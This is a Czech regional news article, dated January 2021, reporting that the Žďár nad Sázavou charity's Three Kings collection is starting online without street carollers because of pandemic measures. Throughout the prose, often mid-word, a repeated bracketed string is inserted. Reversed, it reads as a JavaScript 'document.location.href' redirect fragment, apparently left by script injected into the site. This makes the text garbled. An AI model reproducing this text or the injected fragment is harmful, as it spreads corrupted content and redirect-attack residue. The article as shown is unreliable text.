Rainbow page separator

Tříkrálová sbírka netradičně začíná bez koledníků v ulicích

Sobota, 2. ledna 2021

Žďár nad Sázavou / Bez koledníků v ulicích le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos začíná tradiční lednová Tříkrálová sbírka. Protiepidemická opatření [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to neumožňují. „Organizace sbírky se pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to přesouvá aktuálně do on-line pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru. Možností, jak podpořit služby Oblastní charity Žďár nad Sázavou, je mnoho. Jednou z nich je on-line kasička umístěná na webových stránkách www.trikralovasbirka.cz, kde si dárce sám určí, které charitě chce pomoci. Všechny další formy podpory včetně on-line kasičky naleznou zájemci i na webu www.zdar.charita.cz,” informovala Lenka Šustrová z Oblastní charity Žďár nad Sázavou.
Organizá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toři přes[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to doufají, že se v druhé půli měsíce koledníci v kostýmech a se zapečetěnými kasičkami přede dveřmi domácností objeví. „Nepřestáváme doufat, že v druhé polovině ledna přece jen králové budou moci na svou tradiční pouť vyrazit. Nyní prosíme naše koledníky, aby prozatím do ulic nevycházeli a čekali na naše pokyny ke koledování,“ uvedla koordiná[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka Tříkrálové sbírky pro okres Žďár nad Sázavou Michaela Kuch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová s tím, že termín koledy byl pro rok 2021 prodloužen až do 24. ledna. Žďárská charita rovněž připravuje umístění kasiček na veřejných místech ve městech okresu, jejichž seznam bude k dispozici na charitním webu i sociálních sítích.